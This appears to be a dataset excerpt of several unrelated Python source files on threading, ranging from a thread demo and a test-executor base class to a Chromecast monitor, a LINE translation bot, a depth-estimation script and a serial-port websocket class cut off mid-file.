source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
create_threads.py
|
#!/usr/bin/python
# This multithreading program creates five threads
# and each thread prints "Hello World" with a two-second interval
import threading
import time
def HelloWorld():
"""User defined Thread function"""
print "Hello World"
return
def Main():
threads = [] # Threads list needed when we use a bulk of threads
print "Program started. This program will print Hello World five times..."
for i in range(5):
mythread = threading.Thread(target=HelloWorld)
threads.append(mythread)
time.sleep(2)
mythread.start()
print "Done! Program ended"
if __name__ == "__main__":
Main()
|
base.py
|
"""Executor base classes."""
import threading
from collections import OrderedDict
from testplan.common.entity import Resource, ResourceConfig
from testplan.common.utils.thread import interruptible_join
class ExecutorConfig(ResourceConfig):
"""
Configuration object for
:py:class:`Executor <testplan.runners.base.Executor>` resource.
Inherits all
:py:class:`~testplan.common.entity.base.ResourceConfig`
options.
"""
class Executor(Resource):
"""
Receives items, executes them and create results.
Subclasses must implement the ``Executor._loop`` and
``Executor._execute`` logic to execute the input items.
"""
CONFIG = ExecutorConfig
_STOP_TIMEOUT = 10
def __init__(self, **options):
super(Executor, self).__init__(**options)
self._loop_handler = None
self._input = OrderedDict()
self._results = OrderedDict()
self.ongoing = []
@property
def results(self):
"""Items results."""
return self._results
@property
def added_items(self):
"""Returns added items."""
return self._input
def added_item(self, uid):
"""Returns the added item."""
return self._input[uid]
def add(self, item, uid):
"""
Adds an item for execution.
:param item: To be executed and create a result.
:type item: ``object``
:param uid: Unique id.
:type uid: ``str``
"""
if self.active:
self._input[uid] = item
# `NoRunpathPool` adds item after calling `_prepopulate_runnables`
# so the following step is still needed
if uid not in self.ongoing:
self.ongoing.append(uid)
def get(self, uid):
"""Get item result by uid."""
return self._results[uid]
def _loop(self):
raise NotImplementedError()
def _execute(self, uid):
raise NotImplementedError()
def _prepopulate_runnables(self):
# If we are to apply test_sorter, it would be here
# but it's not easy to implement a reasonable behavior
# as _input could be a mixture of runnable/task/callable
self.ongoing = list(self._input.keys())
def starting(self):
"""Starts the execution loop."""
self._prepopulate_runnables()
self._loop_handler = threading.Thread(target=self._loop)
self._loop_handler.daemon = True
self._loop_handler.start()
def stopping(self):
"""Stop the executor."""
if self._loop_handler:
interruptible_join(self._loop_handler, timeout=self._STOP_TIMEOUT)
def abort_dependencies(self):
"""Abort items running before aborting self."""
for uid in self.ongoing:
yield self._input[uid]
@property
def is_alive(self):
"""Poll the loop handler thread to check it is running as expected."""
if self._loop_handler:
return self._loop_handler.is_alive()
else:
return False
def pending_work(self):
"""Resource has pending work."""
return len(self.ongoing) > 0
|
apiserveroutput.py
|
# Copyright (C) Schweizerische Bundesbahnen SBB, 2016
# Python 3.4
from webbrowser import get
#
# supplies a list of available job-names under http://localhost:8080/jobs
# supplies data for a job under http://localhost:8080/job/<job-name>/lastBuild/api/json
#
__author__ = 'florianseidl'
from http.server import HTTPServer, BaseHTTPRequestHandler
import re
import json
import logging
import sys
from threading import Thread, RLock
from time import sleep
from datetime import datetime
from output import NameFilter
from cimon import JobStatus,RequestStatus,Health
logger = logging.getLogger(__name__)
default_host = "localhost"
default_port = 8080
default_views = {"all" : re.compile(r'.*')}
def create(configuration, key=None):
"""Create an instance (called by cimon.py)"""
global host, port, created, views
if created: # safeguard against double creation since we use global variables
raise ValueError("There is allready one API server configured, only one is allwowed")
host = configuration.get("host", default_host)
port = configuration.get("port", default_port)
views_from_config = configuration.get("views", {}) # view: pattern
for view_name, pattern in views_from_config.items():
views[view_name] = re.compile(pattern if pattern else r'.*')
created = True
return ApiServerOutput(build_filter_pattern=configuration.get("buildFilterPattern", None),
collector_filter_pattern = configuration.get("collectorFilterPattern", None))
created = False
host = default_host
port = default_port
__shared_status__ = {}
server = None
server_lock = RLock()
collector_filter=NameFilter()
views=default_views
def start_http_server_if_not_started():
global server_lock
try:
server_lock.acquire()
global server
if not server:
server = HTTPServer((host, port), ApiServerRequestHandler)
logger.info("Starting http server at %s:%d", host, port)
Thread(target=server.serve_forever).start()
finally:
server_lock.release()
def stop_http_server():
try:
server_lock.acquire()
global server # ignore race conditions as they should not apply (server is only acessed here in cimon loop and on start)
if server:
server.shutdown()
logger.info("Stopped http server")
server = None
finally:
server_lock.release()
def set_shared_status(status):
global __shared_status__
__shared_status__ = status
def get_shared_status():
return __shared_status__.copy()
class ApiServerOutput():
def __init__(self, build_filter_pattern=None, collector_filter_pattern=None):
self.build_filter = NameFilter(collector_pattern=collector_filter_pattern,job_name_pattern=build_filter_pattern)
def on_update(self, status):
start_http_server_if_not_started()
set_shared_status(self.__filter_status__(status))
def __filter_status__(self, status):
filtered = self.build_filter.filter_status(status)
return {k[1]:v for k,v in filtered.items()}
def close(self):
stop_http_server()
class ApiServer():
""" A delegate to the delegate (HTTPRequestHander) as is easy to test """
job_request_pattern = re.compile("/job/([\w\.\-/_]*)/lastBuild/api/json.*")
result_to_color = {Health.SICK : "red",
Health.UNWELL : "yellow",
Health.HEALTHY : "blue"}
health_to_jenkins_status = {Health.SICK : "FAILURE",
Health.UNWELL : "UNSTABLE",
Health.HEALTHY : "SUCCESS"}
def handle_get(self, path):
try:
status = get_shared_status()
if(path == "/jobs"):
return self.list_all_jobs(status=status)
logger.info("handle_get: %s", path)
if "all" in status and status["all"].request_status == RequestStatus.ERROR:
return (500, "Error requesting any job")
else:
job_match = self.job_request_pattern.match(path)
if job_match and len(job_match.groups()) > 0:
logger.info("job_match value=%s", job_match.group(1))
return self.handle_job(job=job_match.group(1), status=status)
else:
logger.info("no job_match")
return (404, 'Path "%s" is not handled.' % path)
except Exception:
logging.error("Error handling HTTP Request", exc_info=True)
return (500, str(sys.exc_info()))
def list_all_jobs(self, status):
return (200, self.__to_jenkins_job_list__(status.keys()))
def __to_jenkins_job_list__(selfself, keys):
jenkins_response = [key for key in keys]
return jenkins_response
def handle_job(self, job, status):
jobWithSlash=job+'/'
# config can contain job name with or without terminating slash; regexp always delivers job name without terminating slash
if job in status:
job_status=status[job]
logging.debug("handle_job: match for job=%s" % job)
elif jobWithSlash in status:
job_status=status[jobWithSlash]
logging.debug("handle_job: match for job=%s" % jobWithSlash)
else:
job_status = None
logging.warning("handle_job: no match for job=%s" % job)
if job_status and job_status.request_status == RequestStatus.OK:
return (200, self.__to_jenkins_job_result__(job_status))
elif job_status and job_status.request_status == RequestStatus.ERROR:
return (500, 'Error requesting job "%s"' % job)
elif job_status and job_status.request_status == RequestStatus.NOT_FOUND:
return (404, "Not found for job %s" % job)
else:
return (404, 'Unkonwn build job "%s"' % job)
def __to_jenkins_job_result__(self, job_status):
jenkins_response = {
"result" : self.health_to_jenkins_status[job_status.health] if job_status.health in self.health_to_jenkins_status else None,
"building" : job_status.active
}
if job_status.number:
jenkins_response["number"] = job_status.number
if job_status.timestamp:
jenkins_response["timestamp"] = job_status.timestamp.timestamp() * 1000
if job_status.names:
jenkins_response["culprits"] = [{"fullName" : name} for name in job_status.names]
if job_status.duration:
jenkins_response["duration"] = job_status.duration
if job_status.fullDisplayName:
jenkins_response["fullDisplayName"] = job_status.fullDisplayName
if job_status.url:
jenkins_response["url"] = job_status.url
if job_status.builtOn:
jenkins_response["builtOn"] = job_status.builtOn
if job_status.cause:
jenkins_response["actions"] = [{"causes": [{"shortDescription": job_status.cause}]}]
return jenkins_response
class ApiServerRequestHandler(BaseHTTPRequestHandler):
""" A shallow adapter to the Python http request handler as it is hard to test"""
api_server = ApiServer()
def do_GET(self):
try:
result = self.api_server.handle_get(self.path)
if(200 <= result[0] < 300):
logging.debug('Response to "%s" http status code %d: %s' % (self.path, result[0], str(result[1])))
self.send_ok(code=result[0], jenkins_response=result[1])
else: # some kind of error....
logging.log(logging.INFO if result[0] < 500 else logging.WARNING, 'Error requesting "%s" http status code %d: %s' % (self.path, result[0], str(result[1])))
self.send_error(code=result[0], message=result[1])
finally:
self.wfile.flush()
def send_ok(self, code, jenkins_response):
self.send_response(code)
self.send_header("Content-type","application/json;charset=utf-8")
self.end_headers()
self.wfile.write(json.dumps(jenkins_response).encode("utf-8"))
if __name__ =='__main__':
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logging.info("test: starting server for manual tests, available job: 'job.a'")
o = ApiServerOutput()
o.on_update({"build" : {"job.a" :{"request_status" : "ok", "result" : "success", "number" : 42, "timestamp" : datetime.fromtimestamp(1467131487.090)}}})
logging.info("test: serving for 30 seconds")
sleep(30)
stop_http_server()
logging.info("test: stopped server")
|
final.py
|
"""Compute depth maps for images in the input folder.
"""
import os
import glob
import torch
import utils
import cv2
import sys
import threading
import serial
from sys import platform
import argparse
import matplotlib.pyplot as plt
import numpy as np
from torchvision.transforms import Compose
from midas.dpt_depth import DPTDepthModel
from midas.midas_net import MidasNet
from midas.midas_net_custom import MidasNet_small
from midas.transforms import Resize, NormalizeImage, PrepareForNet
import math
ser = serial.Serial('COM4', 9600)
def run(img_name, output_path, model_path, model_type="midas_v21_small", optimize=True):
"""Run MonoDepthNN to compute depth maps.
Args:
img_name: catch picture
output_path (str): path to output folder
model_path (str): path to saved model
"""
print("initialize")
# select device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device: %s" % device)
# load network
if model_type == "dpt_large": # DPT-Large
model = DPTDepthModel(
path=model_path,
backbone="vitl16_384",
non_negative=True,
)
net_w, net_h = 384, 384
resize_mode = "minimal"
normalization = NormalizeImage(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
elif model_type == "dpt_hybrid": #DPT-Hybrid
model = DPTDepthModel(
path=model_path,
backbone="vitb_rn50_384",
non_negative=True,
)
net_w, net_h = 384, 384
resize_mode="minimal"
normalization = NormalizeImage(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
elif model_type == "midas_v21":
model = MidasNet(model_path, non_negative=True)
net_w, net_h = 384, 384
resize_mode="upper_bound"
normalization = NormalizeImage(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
elif model_type == "midas_v21_small":
model = MidasNet_small(model_path, features=64, backbone="efficientnet_lite3", exportable=True, non_negative=True, blocks={'expand': True})
net_w, net_h = 256, 256
resize_mode="upper_bound"
normalization = NormalizeImage(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
else:
print(f"model_type '{model_type}' not implemented, use: --model_type large")
assert False
transform = Compose(
[
Resize(
net_w,
net_h,
resize_target=None,
keep_aspect_ratio=True,
ensure_multiple_of=32,
resize_method=resize_mode,
image_interpolation_method=cv2.INTER_CUBIC,
),
normalization,
PrepareForNet(),
]
)
model.eval()
if optimize==True:
# rand_example = torch.rand(1, 3, net_h, net_w)
# model(rand_example)
# traced_script_module = torch.jit.trace(model, rand_example)
# model = traced_script_module
if device == torch.device("cuda"):
model = model.to(memory_format=torch.channels_last)
model = model.half()
model.to(device)
# create output folder
os.makedirs(output_path, exist_ok=True)
print("start processing")
# input
img = utils.read_image(img_name)
img_input = transform({"image": img})["image"]
# compute
with torch.no_grad():
sample = torch.from_numpy(img_input).to(device).unsqueeze(0)
if optimize==True and device == torch.device("cuda"):
sample = sample.to(memory_format=torch.channels_last)
sample = sample.half()
prediction = model.forward(sample)
prediction = (
torch.nn.functional.interpolate(
prediction.unsqueeze(1),
size=img.shape[:2],
mode="bicubic",
align_corners=False,
)
.squeeze()
.cpu()
.numpy()
)
# output
filename = os.path.join(
output_path, "result"
)
# cv2.namedWindow('imagedepth', cv2.WINDOW_NORMAL)
# cv2.imshow('image',prediction)
# cv2.waitKey(0)
mdepth = utils.write_depth(filename, prediction, bits=2)
print("finished")
return mdepth
def processOpenpose(image,op):
# Custom Params (refer to include/openpose/flags.hpp for more parameters)
params = dict()
params["model_folder"] = "../../../models/"
# Construct it from system arguments
# op.init_argv(args[1])
# oppython = op.OpenposePython()
# Add others in path?
params["net_resolution"] = "320x176"
# Starting OpenPose
opWrapper = op.WrapperPython()
opWrapper.configure(params)
opWrapper.start()
imageToProcess = image
# Process Image
datum = op.Datum()
# imageToProcess = cv2.imread(img)
datum.cvInputData = imageToProcess
opWrapper.emplaceAndPop(op.VectorDatum([datum]))
# Display Image
# print("Body keypoints: \n" + str(datum.poseKeypoints))
# cv2.imshow("OpenPose 1.7.0 - Tutorial Python API", datum.cvOutputData)
# cv2.waitKey(0)
return datum.poseKeypoints
# # 图片大小为320x426
# tink = np.ones((426,320),dtype='float64')
# tink = tink
# print(tink.shape)
# for i in range(datum.poseKeypoints.shape[0]):
# for j in range(datum.poseKeypoints.shape[1]):
# x = datum.poseKeypoints[i][j][0]
# y = datum.poseKeypoints[i][j][1]
# if y>426 or x>320:
# continue
# score = datum.poseKeypoints[i][j][2]
# #color = score
# color = 1
# print("x,y",int(y),int(x))
# tink[int(y)][int(x)] = 240 * color / 25
# tink[int(y)+1][int(x)] = 240 * color / 25
# tink[int(y)][int(x)+1] = 240 * color / 25
# tink[int(y)-1][int(x)] = 240 * color / 25
# tink[int(y)][int(x)-1] = 240 * color / 25
# tink[int(y) + 1][int(x)+1] = 240 * color / 25
# tink[int(y)-1][int(x) + 1] = 240 * color / 25
# tink[int(y) - 1][int(x)-1] = 240 * color / 25
# tink[int(y) + 1][int(x) - 1] = 240 * color / 25
# plt.imshow(tink,cmap="gray")
# plt.axis('off')
# plt.show()
def isSend(Keypoints):
"""Three points on one line
Args:
Keypoints :Three points
"""
a_2 =(Keypoints[0][0] - Keypoints[1][0])**2 + (Keypoints[0][1] - Keypoints[1][1])**2
b_2 =(Keypoints[1][0] - Keypoints[2][0])**2 + (Keypoints[1][1] - Keypoints[2][1])**2
c_2 =(Keypoints[0][0] - Keypoints[2][0])**2 + (Keypoints[0][1] - Keypoints[2][1])**2
angle = math.acos((a_2 + b_2 - c_2)/(2 * math.sqrt(a_2) * math.sqrt(b_2)))
print("angle",angle)
if 0 <= angle <= math.pi :
print("ok")
return True
else:
return False
def calculate(poseKeypoints,imageDepth):
for i in range(poseKeypoints.shape[0]): # people
left = [7,6,5]
leftKeypoints = []
right = [4,3,2]
for j in left:
x = poseKeypoints[i][j][0]
y = poseKeypoints[i][j][1]
leftKeypoints.append([x,y])
# print("left",leftKeypoints)
# print(leftKeypoints[1][0])
rightKeypoints = []
for j in right:
x = poseKeypoints[i][j][0]
y = poseKeypoints[i][j][1]
rightKeypoints.append([x,y])
print(rightKeypoints)
print(rightKeypoints[1][0])
if(isSend(leftKeypoints)):
# send data
getDepth = 1
print("leftHand")
# getDepth = imageDepth[int(poseKeypoints[i][7][1])][int(poseKeypoints[i][7][0])]
for i in range(5):
success_bytes = ser.write(str(getDepth).encode("gbk"))
# print("getDepth",imageDepth[int(poseKeypoints[i][7][1])][int(poseKeypoints[i][7][0])])
# if(isSend(rightKeypoints)):
# # getDepth = imageDepth[int(poseKeypoints[i][4][1])][int(poseKeypoints[i][4][0])]
# getDepth = 1
# print("leftHand")
# for i in range(5):
# success_bytes = ser.write(str(getDepth).encode("gbk"))
# # print("getDepth",imageDepth[int(poseKeypoints[i][4][1])][int(poseKeypoints[i][4][0])])
def reads():
""" 读取数据 """
global out
while True:
if out == '':
while ser.inWaiting() > 0:
out += ser.read(1).decode() # 一个一个的读取
print(out)
if 0xFF == ord('q'): # 如果按下q 就截图保存并退出
break
def camera():
global out
cap = cv2.VideoCapture(0) # 打开摄像头
while (1):
# get a frame
ret, frame = cap.read()
# frame = cv2.flip(frame, 1) # 摄像头是和人对立的,将图像左右调换回来正常显示
# frame = cv2.flip(frame, 1) # 摄像头是和人对立的,将图像左右调换回来正常显示
# show a frame
cv2.imshow("capture", frame) # 生成摄像头窗口
if cv2.waitKey(1) and out != '': # 如果按下q 就截图保存并退出
print("okkkk")
x, y = frame.shape[0:2]
imgecroped = cv2.resize(frame, (int(y / 2), int(x / 2)))
print(imgecroped.shape)
cv2.imwrite("test.jpg", imgecroped) # 保存路径
cv2.destroyAllWindows()
# process openpose
poseKeypoints = processOpenpose(imgecroped,op)
# print(type(poseKeypoints))
# compute depth maps
imageDepth = run(imgecroped, args.output_path, args.model_weights, args.model_type, args.optimize)
calculate(poseKeypoints,imageDepth)
# out = ''
break
cap.release()
if __name__ == "__main__":
try:
# Import Openpose (Windows/Ubuntu/OSX)
dir_path = os.path.dirname(os.path.realpath(__file__))
try:
# Windows Import
if platform == "win32":
# Change these variables to point to the correct folder (Release/x64 etc.)
sys.path.append(dir_path + '/../../python/openpose/Release')
os.environ['PATH'] = os.environ['PATH'] + ';' + dir_path + '/../../x64/Release;' + dir_path + '/../../bin;'
import pyopenpose as op
else:
# Change these variables to point to the correct folder (Release/x64 etc.)
sys.path.append('../../python')
# If you run `make install` (default path is `/usr/local/python` for Ubuntu), you can also access the OpenPose/python module from there. This will install OpenPose and the python library at your desired installation path. Ensure that this is in your python path in order to use it.
# sys.path.append('/usr/local/python')
from openpose import pyopenpose as op
except ImportError as e:
print('Error: OpenPose library could not be found. Did you enable `BUILD_PYTHON` in CMake and have this Python script in the right folder?')
raise e
except Exception as e:
print(e)
sys.exit(-1)
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input_path',
default='input',
help='folder with input images'
)
parser.add_argument('-o', '--output_path',
default='output',
help='folder for output images'
)
parser.add_argument('-m', '--model_weights',
default=None,
help='path to the trained weights of model'
)
parser.add_argument('-t', '--model_type',
default='midas_v21_small',
help='model type: dpt_large, dpt_hybrid, midas_v21_large or midas_v21_small'
)
parser.add_argument('-n', '--net_resolution',
default='240x160',
help='size of image'
)
parser.add_argument('--optimize', dest='optimize', action='store_true')
parser.add_argument('--no-optimize', dest='optimize', action='store_false')
parser.set_defaults(optimize=True)
args = parser.parse_args()
print("canshu",args)
# args = parser.parse_known_args()
# # Custom Params (refer to include/openpose/flags.hpp for more parameters)
# params = dict()
# params["model_folder"] = "../../../models/"
# # Add others in path?
# for i in range(0, len(args[1])):
# curr_item = args[1][i]
# if i != len(args[1])-1: next_item = args[1][i+1]
# else: next_item = "1"
# if "--" in curr_item and "--" in next_item:
# key = curr_item.replace('-','')
# if key not in params: params[key] = "1"
# elif "--" in curr_item and "--" not in next_item:
# key = curr_item.replace('-','')
# if key not in params: params[key] = next_item
default_models = {
"midas_v21_small": "weights/midas_v21_small-70d6b9c8.pt",
"midas_v21": "weights/midas_v21-f6b98070.pt",
"dpt_large": "weights/dpt_large-midas-2f21e586.pt",
"dpt_hybrid": "weights/dpt_hybrid-midas-501f0c75.pt",
}
if args.model_weights is None:
args.model_weights = default_models[args.model_type]
# set torch options
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
out = ''
t1 = threading.Thread(target=reads, name='reads')
t2 = threading.Thread(target=camera, name='camera')
t1.start()
t2.start()
|
Multitasking_Using_Multiple_Thread.py
|
# Multitasking using multiple thread
from threading import Thread
class Hotel:
def __init__(self, t):
self.t = t
def food(self):
for i in range(1, 6):
print(self.t, i)
h1 = Hotel("Take Order from table")
h2 = Hotel("Serve order to table")
t1 = Thread(target=h1.food)
t2 = Thread(target=h2.food)
t1.start()
t2.start()
|
main.py
|
from flask import Flask, request, abort
from os import environ, path
import requests
from tinytag import TinyTag
from zhconv import convert
from helper import database
import threading
from linebot import (
LineBotApi, WebhookHandler
)
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent, TextMessage, TextSendMessage,
AudioSendMessage
)
from linebot.exceptions import LineBotApiError
app = Flask(__name__)
line_bot_api = LineBotApi(environ['LINE_CHANNEL_ACCESS_TOKEN'])
handler = WebhookHandler(environ['LINE_CHANNEL_SECRET'])
@app.route('/')
def index():
return 'It works!'
@app.route('/callback', methods=['POST'])
def callback():
signature = request.headers['X-Line-Signature']
body = request.get_data(as_text=True)
app.logger.info('X-Line-Signature: ' + signature)
app.logger.info('Request body: ' + body)
try:
handler.handle(body, signature)
except InvalidSignatureError:
app.logger.error('LINE_CHANNEL_SECRET Error.')
abort(400)
return 'OK'
@handler.add(MessageEvent, message=TextMessage)
def handle_message(event):
base_dir = path.abspath(path.dirname(__file__))
relative_dir = 'static/uploads/'
file_name = event.message.id
file_extension = '.mp3'
file_rel_path = path.join(relative_dir, file_name + file_extension)
file_abs_path = path.join(base_dir, file_rel_path)
url_path = path.join('https://' + request.host, file_rel_path)
msg = str(event.message.text)
url = 'https://translate.google.com/translate_tts?ie=UTF-8&client=tw-ob&tl=en&q={}'.format(msg)
res = requests.get(url)
with open(file_abs_path, 'wb') as fd:
for chunk in res.iter_content():
fd.write(chunk)
tiny_tag = TinyTag.get(file_abs_path)
# print('It is %f milliseconds long.' % (tiny_tag.duration * 1000))
params = {
'key': environ['YANDEX_API_KEY'],
'text': msg,
'lang': 'zh',
}
res = requests.get('https://translate.yandex.net/api/v1.5/tr.json/translate', params=params)
yandex = res.json()
yandex_text = convert(yandex['text'][0], 'zh-tw')
try:
line_bot_api.reply_message(event.reply_token, [
AudioSendMessage(
original_content_url=url_path,
duration= tiny_tag.duration * 1000, #milliseconds
),
TextSendMessage(text='你說:「'+event.message.text+'」。'),
TextSendMessage(text='點這裡聽聽看:{}'.format(url_path)),
TextSendMessage(text='意思是:{}'.format(yandex_text)),
])
except LineBotApiError as e:
print(e.status_code)
print(e.error.message)
print(e.error.details)
if not environ.get('GOOGLE_CLIENT_SECRET') or not environ.get('GOOGLE_SHEET_NAME'):
app.logger.info("GOOGLE_CLIENT_SECRET or GOOGLE_SHEET_NAME was not found or empty.")
else:
profile = line_bot_api.get_profile(event.source.user_id)
kwargs_dict = {
'profile_dict': {
'display_name': profile.display_name,
'picture_url': profile.picture_url,
'status_message': profile.status_message,
'user_id': profile.user_id
},
'msg': msg
}
db_thread = threading.Thread(target=database.append_google_sheet, kwargs=kwargs_dict)
db_thread.start()
if __name__ == '__main__':
app.run(port = int(environ['PORT']))
|
main.py
|
from tkinter import *
import os
import time
import threading
import commands
from recognize import hear, getcommand, say
'''Thread Control Variable'''
thread_control = -1
'''Threading Function'''
def auto_control():
global thread_control
while True:
'''Hear current audio and use it for processing'''
if thread_control==1:
entry_text.set("")
entry_text.set(getcommand())
submit()
else:
time.sleep(0.4)
'''Thread 1'''
thread1 = threading.Thread(target=auto_control)
window = Tk()
window.wait_visibility(window)
window.title("Rachel - Voice Assistant")
window.wm_attributes('-alpha',0.8)
entry_text=StringVar()
thread1.start()
def set_size_and_location(window, w, h, x, y):
w = int(w * window.winfo_screenwidth())
h = int(h * window.winfo_screenheight())
x = int(x * window.winfo_screenwidth())
y = int(y * window.winfo_screenheight())
window.geometry('%dx%d+%d+%d' % (w,h,x,y))
def hide_and_show_window():
global window,thread_control,entry
window.withdraw()
'''Making The Window Reappear'''
#hear()
thread_control=1
window.update()
window.deiconify()
entry.focus_set()
'''Function to Take Input From Text Field And Give In for processing'''
def submit():
global entry_text,thread_control, head, heading
thread_control=-1
'''Getting Query'''
x = entry_text.get()
x = x.lower()
heading.place(relx = 0.20)
head.set("Processing")
x1 = commands.command(x, head)
head.set("Rachel")
heading.place(relx = 0.45, rely = 0.2)
hide_and_show_window()
''' Initialization Of GUI,setting size and location'''
set_size_and_location(window,0.25,0.25,0.8,0.1)
'''Set Background Color'''
window.configure(background='black')
'''Adding Heading of Assistant'''
head = StringVar()
head.set("Rachel")
heading = Label( window, textvariable = head, anchor="center", bg='black', fg='white')
heading.place(relx=0.45,rely=0.2)
'''Adding Text Field To Take Commands'''
entry = Entry(window,bd=1,width=int(window.winfo_screenwidth()*0.025), bg='#171c26', textvariable=entry_text)
entry.place(relx=0.1,rely=0.6)
hide_and_show_window()
window.mainloop()
|
monitor.py
|
import pychromecast
import threading
import time
import logging
import pprint
from typing import List, Dict
logger = logging.getLogger(__name__)
def get_device_info(cast: pychromecast.Chromecast) -> Dict[str, str]:
return {'uuid': cast.device.uuid, 'name': cast.device.friendly_name}
def find_differences(actual: Dict, expected: Dict):
differences = {}
for key in actual:
actual_value = actual[key]
if isinstance(actual_value, dict):
expected_value = expected.get(key, {})
difference = find_differences(actual_value, expected_value)
if difference:
differences[key] = difference
else:
try:
expected_value = expected[key]
if expected_value != actual_value:
differences[key] = actual_value
except KeyError:
differences[key] = actual_value
return differences
class MonitorThread(threading.Thread):
UPDATE_DEVICES_PERIOD = 10.0
UPDATE_STATUS_PERIOD = 1.0
def __init__(self):
super(MonitorThread, self).__init__()
self.stop_event = threading.Event()
self.cast_list_lock = threading.Lock()
self.cast_list = []
self.last_statuses = {}
def update_devices(self):
last_list = [cast.device.friendly_name for cast in self.cast_list]
with self.cast_list_lock:
self.cast_list, cast_browser = pychromecast.get_chromecasts()
name_list = [cast.device.friendly_name for cast in self.cast_list]
casts_added = [cast.device.friendly_name for cast in self.cast_list
if cast.device.friendly_name not in last_list]
casts_removed = [name for name in last_list if name not in name_list]
rv = {}
if casts_added:
logger.info(f"Casts added: {casts_added}")
rv["added"] = casts_added
if casts_removed:
logger.info(f"Casts removed: {casts_removed}")
rv["removed"] = casts_removed
return rv
def update_statuses(self, retries=1):
cur_statuses = {}
with self.cast_list_lock:
for cast in self.cast_list:
for i in range(retries + 1):
cast.wait()
mc = cast.media_controller
if mc.status.last_updated is None:
continue
cur_statuses[cast.device.friendly_name] = {
'content_id': mc.status.content_id,
'content_type': mc.status.content_type,
'duration': mc.status.duration,
'title': mc.status.title,
}
status_changes = find_differences(cur_statuses, self.last_statuses)
self.last_statuses = cur_statuses
if status_changes:
logger.info("Updated statuses:\n" + pprint.pformat(status_changes))
return status_changes
def stop(self):
self.stop_event.set()
def run(self) -> None:
last_devices_update = None
last_status_update = None
while not self.stop_event.is_set():
now = time.perf_counter()
if (last_devices_update is None) or (
now - last_devices_update >= self.UPDATE_DEVICES_PERIOD):
last_devices_update = now
self.update_devices()
if (last_status_update is None) or (
now - last_status_update >= self.UPDATE_STATUS_PERIOD):
last_status_update = now
self.update_statuses()
# class MonitorShell(cmd.Cmd):
# intro = ('Ready to monitor chromecast and maanage recordings.\n'
# 'Type help or ? to list commands.\n')
# prompt = '(monitor) '
# options = {}
# active = None
# active_id = None
# active_title = None
# destination = None
# destination_root = os.path.join(pathlib.Path.home(), "Recordings")
# date_fmt = "%Y-%m-%d_%H-%M-%S"
#
# def do_bye(self, _):
# """ Stop recording, close the window, and exit """
# print('Peace Love Unity Respect')
# # self.close()
# return True
#
# def _print_options(self):
# print("\n".join(f"({k}): {self.options[k].device.friendly_name}"
# for k in sorted(self.options)))
#
# def do_monitor(self, arg):
# if self.active:
# friendly_name = self.active.device.friendly_name
# print(f"Monitor already active on {friendly_name}")
# return
#
# self._update_options()
#
# try:
# selection = int(arg)
# if selection > 0:
# friendly_name = self.options[selection]
# else:
# print(f"Selection out of bounds '{arg}'")
# self._print_options()
# return
# except ValueError:
# try:
# selection = min(k for k in self.options
# if self.options[k].device.friendly_name == arg)
# friendly_name = self.options[selection]
# except ValueError:
# print(f"Failed to parse selection '{arg}'")
# self._print_options()
# return
# except KeyError:
# print(f"Selection out of bounds '{arg}'")
# self._print_options()
# return
#
# self.active = self.options[selection]
# self._start_thread()
# print(f"Monitor started on {self.active.device.friendly_name}")
#
# #-- helper methods
# def _start_thread(self):
# self.active_id = None
# self.active_title = None
# self.destination = os.path.join(self.destination_root,
# self.active.device.friendly_name)
# os.makedirs(self.destination, exist_ok=True)
# thread = threading.Thread(target=self._monitor)
# thread.start()
#
# def _set_active_content(self, content_id: str, title: str):
# if content_id != self.active_id:
# self.active_id = content_id
# self.active_title = title
# now = datetime.datetime.now()
# print(f"[{now}] Video changed: '{title}' ({content_id})")
# file_name = now.strftime(self.date_fmt) + ".txt"
# path_file = os.path.join(self.destination, file_name)
# with open(path_file, "w") as file:
# file.write(f"https://www.youtube.com/watch?v={content_id}\n")
# file.write(f"{title}\n")
#
# def _monitor(self):
# self.active.wait()
# mc = self.active.media_controller
# while True:
# cur_id = mc.status.content_id
# if cur_id != self.active_id:
# self._set_active_content(cur_id, mc.status.title)
# time.sleep(1.0)
#
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
thread = MonitorThread()
thread.start()
try:
while True:
pass
except KeyboardInterrupt:
print("Stopping thread...")
thread.stop()
|
deviceWebSocket.py
|
#!/usr/bin/env python
import os, serial, threading
import json
import socket
from time import sleep
import datetime
import termios, sys
import atexit
import optparse
import random
import simulator
import RTC_DS1307 as RTC
global mysocketMessage
global mysocketMessageJSON
global myEvent
class socketMessage:
def __init__(self):
self.counter = 0
self.text = 'idle'
self.Line = ''
self.status = 'idle'
class deviceWebSocket:
def __init__(self, port, baudrate, parity, echo, simulation):
global myEvent
global mysocketMessage
self.clientMessage = ''
self.receivedString = ''
# background or interactive mode?
if os.isatty(sys.stdin.fileno()):
# command line mode.
print "started from command line"
self.termTrueFalse = True
self.RTCinstalled = 0
pass
else:
# Cron mode.
print "started from cron"
self.termTrueFalse = False
self.RTCinstalled = 1
pass
if self.RTCinstalled == 1:
self.myrtc = RTC.RTC_DS1307()
if self.RTCinstalled == 1:
nowdatetime = self.myrtc.read_str()
else:
nowdatetime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print nowdatetime
myEvent = threading.Event()
mysocketMessage = socketMessage()
if self.termTrueFalse == True:
# Save the terminal settings
self.fd = sys.stdin.fileno()
self.new_term = termios.tcgetattr(self.fd)
self.old_term = termios.tcgetattr(self.fd)
# New terminal setting unbuffered
# self.new_term[3] = (self.new_term[3] & ~termios.ICANON & ~termios.ECHO)
self.new_term[3] = (self.new_term[3] & ~termios.ICANON)
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.new_term)
# Support normal-terminal reset at exit
atexit.register(self.set_normal_term)
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, timeout=1)
self.echo = echo
self.counter = 0
self.simulation = simulation
self.previousdatetime="2016-09-11 00:37:41"
